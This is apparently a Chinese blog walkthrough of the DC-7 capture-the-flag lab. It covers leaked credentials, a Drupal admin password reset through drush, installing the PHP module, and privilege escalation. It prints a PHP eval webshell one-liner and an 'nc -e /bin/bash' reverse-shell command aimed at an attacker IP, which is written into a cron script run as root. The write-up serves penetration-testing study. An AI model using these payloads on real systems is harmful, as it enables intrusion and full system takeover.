dc7靶机攻略

dc7

扫描

image-20231023211247923

image-20231023212101077

渗透

image-20231023213341684

dc7首页上去就是一个提示,跳脱常规思维

首页有个搜索框,尝试利用没成功

观察,只有首页右下角有个dc7user不知道是啥,拿去搜一下

image-20231023212425952

image-20231023212550180

在php配置文件中发现账号密码

dc7user:MdR3xOgB7#dW

尝试网页登录失败,然后试试ssh成功

image-20231023213618358

backups里发现gpg加密文件

image-20231023214101412

此处貌似无法使用gpg解密

初次之外还发现一个计划任务文件

image-20231023214548822

想利用这个,但是权限不足不能编写,只有root和www-data可以修改,直接执行没有意义

执行文件/opt/scripts/backups.sh,看一看内容

image-20231023214951541

虽然不能直接利用,但是发现它用来drush指令

drush一般用来操作drupal,刚好靶机用的这个

进入可以进行操作的目录下/var/www/html

执行代码修改admin的密码

drush user-password admin --password=123456

image-20231023215515100

成功使用admin登录后台

发现该处有上传文件的位置

image-20231023215851304

image-20231023220226905

到此处选择格式,并没有php,那也就无法执行一句话木马

上网查询找到可以安装php的方法,找到manage-extend

image-20231023220456824

输入php模块包的url安装

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

image-20231023220527911

完成后选择启用新的添加模块

image-20231023220645552

找到php的勾选上

image-20231023220711699

然后翻到最底下install

然后回去写入一句话木马

<?php @eval($_POST["cmd"]);?>

image-20231023221229093

上传成功使用蚁剑连接

image-20231023221940857

然后反弹shell到kali

image-20231023222001836

提权

刚才找到的脚本文件有修改权限的是root和www-data,而此处刚好是www-data用户

于是去编辑刚才那个脚本文件

/opt/scripts/backups.sh

该文件在任务中会被以root的身份执行,因此只需要像其中写反弹shell即可获取root的shell

echo "nc -e /bin/bash 10.4.7.138 6789" > backups.sh

image-20231023222756592

等了许久连接成功

image-20231023223152058

flag在老地方

image-20231023223221248

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值